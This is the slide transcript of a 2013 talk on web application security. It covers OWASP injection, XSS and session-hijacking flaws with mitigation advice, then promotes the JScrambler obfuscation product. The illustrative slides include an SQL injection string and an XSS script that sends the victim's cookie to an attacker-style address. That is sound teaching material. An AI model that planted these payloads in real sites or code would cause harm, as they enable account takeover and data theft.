1 / 29

Pedro Fortuna Co-founder and CTO

Protecting the code of Web Applications. Pedro Fortuna Co-founder and CTO. ISEP, June 19th 2013. Agenda. + web. NEXT. Web Application Security. Where things went wrong?. GET /index.html. Content delivery system. Web Browser. Web Server. static text. Where things went wrong?.

torn
Download Presentation

Pedro Fortuna Co-founder and CTO

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Protecting the code of Web Applications • Pedro Fortuna Co-founder and CTO ISEP, June 19th 2013

  2. Agenda

  3. +web NEXT Web Application Security

  4. Where things went wrong? GET /index.html Content delivery system Web Browser Web Server static text

  5. Where things went wrong? GET /index.html Content delivery system Web Browser Web Server static text GET /form.php?id=2&name=pedro%20fortuna Application delivery system Web Browser Web Server DB dynamically generated response

  6. Where things went wrong? • Users can submit arbitrary data to the server • This includes all non-obvious sources of data that can be used by the application (cookies, HTTP headers) • Data is mixed with all sorts of code (HTML, JavaScript, CSS, SQL) • Complex to filter, escape and output-encode data <?PHP $place = 'Peter's Pizza';print $place; ?> DB "umafrasealeatória" HTML escaping PHP string escaping <?PHP $place = 'Peter\'s Pizza';print $place; ?> DB &quot;umafrasealeat&oacute;ria&quot;

  7. OWASP Top 10 2010 edition http://www.owasp.org/index.php/Top_10

  8. A1 - Injection

  9. Account: SKU: Account: SKU: SQL Injection - Illustrated "SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’" Account Summary Acct:5424-6066-2134-4334 Acct:4128-7574-3921-0192 Acct:5424-9383-2039-4029 Acct:4128-0004-1234-0293 DB Table   HTTP response   SQL query HTTP request Finance Transactions Accounts Administration Communication Knowledge Mgmt E-Commerce Bus. Functions Databases Legacy Systems Web Services Directories Billing Human Resrcs Application Layer APPLICATIONATTACK Custom Code 1. Application presents a form to the attacker 2. Attacker sends an attack in the form data App Server 3. Application forwards attack to the database in a SQL query Web Server Hardened OS 4. Database runs query containing attack and sends encrypted results back to application Network Layer Firewall Firewall 5. Application decrypts data as normal and sends results to the user

  10. A1 – Avoiding Injection Flaws • Recommendations • Avoid the interpreter entirely, or • Use an interface that supports bind variables (e.g., prepared statements, or stored procedures), • Bind variables allow the interpreter to distinguish between code and data • Encode all user input before passing it to the interpreter • Always perform ‘white list’ input validation on all user supplied input • Always minimize database privileges to reduce the impact of a flaw • References • For more details, read http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

  11. A2 – Cross-Site Scripting (XSS)

  12. Finance Transactions Accounts Administration Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code Cross-Site Scripting (XSS) Illustrated 1 Attacker sets the trap – update my profile Application with stored XSS vulnerability Hello my name is Peter <script> XSSImage=new Image; XSSImage.src="http://1.2.3.4/catcher?cookie="+document.cookie); </script> Attacker enters a malicious script into a web page that stores the data on the server 2 Victim views page – sees attacker profile Script runs inside victim’s browser with full access to the DOM and cookies 3 Script silently sends attacker Victim’s session cookie

  13. A2 – Avoiding XSS flaws • Recommendations • Eliminate Flaw • Don’t include user supplied input in the output page • Defend Against the Flaw • Primary Recommendation: Output encode all user supplied input (Use OWASP’s ESAPI to output encode: http://www.owasp.org/index.php/ESAPI • Perform ‘white list’ input validation on all user input to be included in page • For large chunks of user supplied HTML, use OWASP’s AntiSamy to sanitize this HTML to make it safe See: http://www.owasp.org/index.php/AntiSamy • References • For how to output encode properly, read the new http://www.owasp.org/index.php/XSS_(Cross Site Scripting) Prevention Cheat Sheet

  14. Safe Escaping Schemes in Various HTML Execution Contexts #1: ( &, <, >, " )  &entity; ( ', / )  &#xHH; ESAPI: encodeForHTML() HTML Element Content (e.g., <div> some text to display </div> ) #2: All non-alphanumeric < 256  &#xHH ESAPI: encodeForHTMLAttribute() HTML Attribute Values (e.g., <input name='person' type='TEXT' value='defaultValue'> ) #3: All non-alphanumeric < 256  \xHH ESAPI: encodeForJavaScript() JavaScript Data (e.g., <script> some javascript</script> ) #4: All non-alphanumeric < 256  \HH ESAPI: encodeForCSS() CSS Style Property Values (e.g., .pdiv a:hover {color: red; text-decoration: underline} ) #5: All non-alphanumeric < 256  %HH ESAPI: encodeForURL() URI Attribute Values (e.g., <a href="javascript:toggle('lesson')" ) Recommendation: Only allow #1 and #2 and disallow all others See: www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet for more details

  15. A3 – Broken Authentication and Session Management

  16. Finance Transactions Accounts Administration Communication Knowledge Mgmt E-Commerce Bus. Functions Custom Code A3 – Broken Authentication Illustrated 1 User sends credentials www.foo.com?JSESSIONID=9FA1DB9EA... Site uses URL rewriting (i.e., put session in URL) 2 3 User clicks on a link to http://www.hacker.com in a forum Hacker checks referer logs on www.hacker.com and finds user’s JSESSIONID 4 5 Hacker uses JSESSIONID and takes over victim’s account

  17. A3 – Avoiding Broken Authentication and Session Management • Verify your architecture • Authentication should be simple, centralized, and standardized • Use the standard session id provided by your framework (e.g. PHP Zend) • Be sure SSL protects both credentials and session id at all times • Verify the implementation • Check your SSL certificate • Examine all the authentication-related functions • Verify that logoff actually destroys the session • Make the session expire • Make the session unmovable (function(IP_ADDRESS)) • Follow the guidance from • http://www.owasp.org/index.php/Authentication_Cheat_Sheet

  18. +JS NEXT JScrambler

  19. Who we are ? Top Web Security Team 30Y of combined experience Being advised by Pereira Ventures in its International Expansion The Company Started in late 2008 Following the vision that software and data are migrating rapidly to the web, but security isn’t evolving at the same pace. Innovative Web Security Solutions Top 100 European Startup in 2009 In the European Unlimited Eurecan European Contest Vision: we believe that the strongest approach to Web Security should be to put the 1st line of defense on the client-side Mission: to be a leader in Web Application Protection technology Awards The Start Vision/Mission Leaders in JavaScript Obfuscation since 2010

  20. What do we do? Web Traffic Auditing Security Services JavaScript Source code protection Obfuscates JS/HTML5 WebApps Protects the code from being stolen, inspected, tampered with Web Application Security Enterprise Web Application Protection against Man int the Browser and other security attacks

  21. What is the world’s most popular language ?

  22. 3+ Years Protecting Apps 2010-04 Beta version 2010-10 1.0 released 2012-06 2.0 released 2013-04 3.0 released +3 YEARS PROTECTING WEB APPLICATIONS Release History JS lines of code Clients Countries 120 5000 106 MILLION PROTECTED

  23. JScrambler Feedback Customer Customer NEWS RSA SECURITY ROVIO TECHCRUNCH "We are trying to push the envelope and it’s good to have a nimble partner that is aggressive at achieving this” “JScrambler does seem to offer the most complete solution. Out of the box, it should work with most of the standard libraries” “JScrambler results look promising”

  24. JScrambler State of the art Web Application Protection and Optimization JavaScript JavaScript JavaScript Obfuscation CodeExecution Control Optimization Domain Lock Expiration Date Anti-debugging HTML5/JavaScript Mobile Web Applications Web Games Code Simplification Dead Code Removal Compression

  25. JScrambler Obfuscation: The art of making code unreadable

  26. JScrambler Code Execution Control Domain Lock Expiration Date Anti Debugging

  27. NEXT JavaScript Obfuscation

  28. NEXT Questions We look forward for you contact and feedback

  29. Contact Us auditmark.com Lisbon Office Pedro Fortuna CTO Porto Headquarters pedro.fortuna@auditmark.com +351 917331552 Rua da Prata 121 5º A 1100-415 Lisboa Portugal Edifício Central da UPTEC Rua Alfredo Allen, 455 4200-135 Porto, Portugal

More Related